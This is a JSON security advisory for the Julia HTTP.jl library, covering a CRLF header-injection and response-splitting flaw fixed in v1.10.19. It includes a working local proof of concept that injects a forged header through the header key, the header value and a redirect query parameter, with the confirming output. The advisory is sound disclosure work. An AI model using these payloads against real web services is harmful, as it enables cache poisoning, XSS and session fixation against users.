{"id":"JLSEC-2025-40","summary":"Header injection/Response splitting via header construction.","details":"HTTP.jl did not validate header names/values for illegal characters, allowing CRLF-based header injection and response splitting.\n\n```\nusing HTTP, Sockets\n\nfunction handle_index(req::HTTP.Request)\n    @show HTTP.header(req, \"X-Foo\")\n    return HTTP.Response(200, \"ok\")\nend\n\nfunction handle_redirect(req::HTTP.Request)\n    return HTTP.Response(301, [\"Location\" =\u003e get(HTTP.URIs.queryparams(req), \"to\", \"/\")], \"redirect\")\nend\n\nconst router = HTTP.Router()\nHTTP.register!(router, \"GET\", \"/\", handle_index)\nHTTP.register!(router, \"GET\", \"/redirect\", handle_redirect)\n\nserver = HTTP.serve!(router, Sockets.IPv4(0,0,0,0), 8080)\n\n\nprintln(\"[*] POC 1: Header injection in request through header key\")\nuser_input = \"X-Custom: x\\r\\nX-Foo: Bar\\r\\nX-Custom\"\nHTTP.get(\"http://localhost:8080/\", [user_input =\u003e \"hello\"])\n\nprintln()\n\nprintln(\"[*] POC 2: Header injection in request through header value\")\nuser_input = \"hello\\r\\nX-Foo: Bar\"\nHTTP.get(\"http://localhost:8080/\", [\"X-Custom\" =\u003e user_input])\n\nprintln()\n\nprintln(\"[*] POC 3: Header injection in response through header value\")\nres = HTTP.get(\"http://localhost:8080/redirect?to=/%0d%0aX-Foo:%20Bar\", redirect=false)\n@show HTTP.header(res, \"X-Foo\")\n\n```\n\n_Result_\n\n```\n[ Info: Listening on: [0.0.0.0:8080](http://0.0.0.0:8080/), thread id: 1\n[*] POC 1: Header injection in request through header key\nHTTP.header(req, \"X-Foo\") = \"Bar\"\n\n[*] POC 2: Header injection in request through header value\nHTTP.header(req, \"X-Foo\") = \"Bar\"\n\n[*] POC 3: Header injection in response through header value\nHTTP.header(res, \"X-Foo\") = \"Bar\"\n```\n\n### Impact\n\nThis enables HTTP response splitting and header injection, leading to cache poisoning, XSS, session fixation, and more.\n\n### Patches\n\nThis issue is fixed in HTTP.jl  `v1.10.19`\n\n### Credit\n\nChen T","aliases":["CVE-2025-61689","GHSA-h3x8-ppwj-6vcj"],"modified":"2025-11-06T22:57:16.515669Z","published":"2025-10-14T04:37:19.606Z","database_specific":{"license":"CC-BY-4.0","sources":[{"published":"2025-10-10T12:51:29Z","url":"https://api.github.com/repos/JuliaWeb/HTTP.jl/security-advisories/GHSA-h3x8-ppwj-6vcj","imported":"2025-10-14T02:22:26.408Z","modified":"2025-10-10T12:51:29Z","html_url":"https://github.com/JuliaWeb/HTTP.jl/security/advisories/GHSA-h3x8-ppwj-6vcj","id":"GHSA-h3x8-ppwj-6vcj"}]},"affected":[{"package":{"name":"HTTP","ecosystem":"Julia","purl":"pkg:julia/HTTP?uuid=cd3eb016-35fb-5094-929b-558a96fad6f3"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.10.19"}]}],"database_specific":{"source":"https://github.com/JuliaLang/SecurityAdvisories.jl/tree/generated/osv/2025/JLSEC-2025-40.json"}}],"schema_version":"1.7.3"}